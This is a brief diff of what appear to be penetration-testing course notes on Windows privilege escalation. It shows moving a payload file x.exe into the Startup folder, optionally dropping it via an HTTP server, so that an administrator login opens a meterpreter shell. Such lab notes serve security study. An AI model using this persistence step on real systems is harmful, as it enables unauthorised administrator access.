Khaled6120/PNPT/PEH/Priv_Esc.md

 #now copy x.exe to windows machine
 move x.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
+# or using http server, to drop the file in win machine

 #logout and then login as administrator
 #we get a meterpreter shell now